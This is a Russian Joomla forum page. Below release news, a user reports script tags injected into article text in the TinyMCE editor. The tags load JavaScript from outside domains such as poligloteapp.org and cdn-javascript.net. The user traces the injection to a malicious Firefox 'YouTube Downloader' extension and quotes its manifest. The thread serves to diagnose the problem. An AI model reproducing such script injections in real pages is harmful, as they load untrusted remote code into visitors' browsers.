Новости Joomla

Вышли релизы безопасности Joomla 6.0.2 и Joomla 5.4.2

Релиз безопасности Joomla 6.0.2 и 5.4.2

Проект Joomla спешит сообщить о выпуске Joomla 6.0.2 и Joomla 5.4.2. Это релиз безопасности для серии Joomla 6.0 и релиз безопасности для серии Joomla 5.4.

JL Content Fields Filter 4.0.0

JL Content Fields Filter 4.0.0

JL Content Fields Filter - Это бесплатный модуль, который фильтрует материалы в категории Joomla согласно настраиваемым полям.

Данный крупный релиз включает полную совместимость с Joomla 6, критические исправления безопасности, полностью модернизированный интерфейс администратора и обширный рефакторинг кода.

Ключевые Особенности:

- Полная совместимость с Joomla 6: Полная миграция на PSR-4, удаление устаревших методов, исправления для PHP 8.2+ и современные взаимодействия с базой данных.

- Полностью переписанный интерфейс компонента:

- Современный JS стек (Native Fetch, ES6+, модальные окна Bootstrap 5)

- Новое поле FilterfieldsField для предварительного просмотра фильтров в реальном времени.

- Полный CRUD, улучшенные функции SEO и улучшенный UX.

- Критические исправления безопасности:

- 5 SQL-инъекций устранены в нескольких файлах.

- Добавлена защита от XSS, улучшены токены CSRF и проверки разрешений.

- Улучшения модуля и плагина: Улучшенная функциональность слайдера, лучшие сбросы форм, динамическое обнаружение контекста для плагинов и оптимизированная логика фильтрации.

Страница расширения:
https://joomline.ru/rasshirenija/moduli/jlcontentfieldsfilter.html

0 Пользователей и 1 Гость просматривают эту тему.
  • 2 Ответов
  • 1944 Просмотров
*

Anvesinus

  • Новичок
  • 6
  • 0 / 0
Здравствуйте. Версия 3.8.10. Да, нужно обновить, знаю(

При создании нового материала, в тексте материала, если перейти из форматирования редактора TinyMCE  в простой текст, стал появляться вот такой код:

Код
<script src="//s3.amazonaws.com/jscript-load/какиетоцифрыибуквы.js"></script>
<script type="text/javascript" src="https://poligloteapp.org/optout/set/lat?jsonp=__mtz_cb_какиетоцифрыибуквы&amp;key=какиетоцифрыибуквы&amp;cv=какиетоцифрыибуквы&amp;t=какиетоцифрыибуквы"></script>
<script type="text/javascript" src="https://static-resource.com/js/int.js?key=какиетоцифрыибуквы&amp;uid=какиетоцифрыибуквы"></script>
<script type="text/javascript" src="https://cdn-javascript.net/api?key=какиетоцифрыибуквы&amp;uid=какиетоцифрыибуквыx&amp;format=arrjs&amp;r=какиетоцифрыибуквы"></script>

Когда произошло заражение я сказать не могу даже приблизительно, может полгода назад может недавно. Поэтому методом поиска измененных файлов я не смог найти, файлов менялось много и непонятно в каком вирус.

Я пробовал искать фрагменты вируса командой  grep -ril poligloteapp ./ - это не дало результата, ничего не находится.

Может он дишефруется на ходу? А может это не вирус даже, проверка онлайн антивирусами не дала результата.

Помогите пожалуйста понять как это удалить и где оно может находиться?
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
*

Anvesinus

  • Новичок
  • 6
  • 0 / 0
Откуда Joomla ? А в другом браузере пробовали ?

Спасибо!!! Вы мне помогли! Это оказалось дополнение для Firefox Youtube Downloader. Даже не подумал, что такое может быть. Страничку дополнения не сохранил когда удалял, но нашел в бэкапе профиля браузера это расширение, посмотрел метаданные, вот эта дрянь:

Код
   "short_name":"YouTube Downloader",
   "name":"YouTube Downloader",
   "description":"Looking for youtube video downloader? Install the YouTube Downloader and download video from YouTube.",
   "applications": {
      "gecko": {
        "id": "YouTube@develop.com"
"homepage_url":"https://addons.mozilla.org/en-US/firefox/addon/youtube-downloader-wds",
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Скрипт для поиска вирусов и вредоносных скриптов на сайте "AI-Bolit"

Автор revisium

Ответов: 110
Просмотров: 71553
Последний ответ 30.08.2023, 12:53:33
от SeBun
Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

Ответов: 1
Просмотров: 3529
Последний ответ 25.05.2023, 08:49:57
от Театрал
Re: Кажется вирус на сайте

Автор motokraft

Ответов: 24
Просмотров: 5125
Последний ответ 04.05.2022, 14:04:17
от ProtectYourSite
Хостинг пишет, что найден вирус в /media/com_media/js/media-manager-es5.js

Автор AlexP750

Ответов: 6
Просмотров: 3529
Последний ответ 22.02.2022, 11:38:15
от AlexP750
Спам, вирус или дело в браузере Google

Автор alekcae

Ответов: 13
Просмотров: 2148
Последний ответ 16.05.2021, 18:52:24
от alekcae